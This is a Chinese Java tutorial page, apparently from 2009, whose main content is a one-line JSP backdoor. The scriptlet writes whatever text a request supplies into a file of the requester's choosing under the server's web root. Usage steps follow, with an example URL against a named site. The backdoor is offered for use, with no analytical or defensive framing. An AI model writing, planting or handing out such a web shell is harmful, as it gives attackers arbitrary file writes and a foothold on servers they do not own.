当前位置: 首页 > 图文教程 > 网络编程 > JSP > JSP一句话后门

JSP
Hibernate 的原理与配置
Java中关于XML的API
Eclipse插件开发之新手入门
为什么要学习Hibernate?
Java2下Applet数字签名
Weblogic上配置Hibernate为JNDI
JavaBean(EJB) 3.0 全新体验
品味Spring 的魅力
Hibernate的JNDI绑定分析
Java开源项目Hibernate
JDO 2.0查询语言的特点
JBuilderX+SQL Server开发hibernate
运行时实现Java的多态性
Hibernate获得成功的十大理由
Hibernate包作用详解
Java动态代理实现AOP
J2SE1.5 注释语法
Java代码构建一个线程池
JBuilder2005开发Web应用程序
Java数据库编程中的技巧

JSP一句话后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 31 ::
收藏到网摘: n/a

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld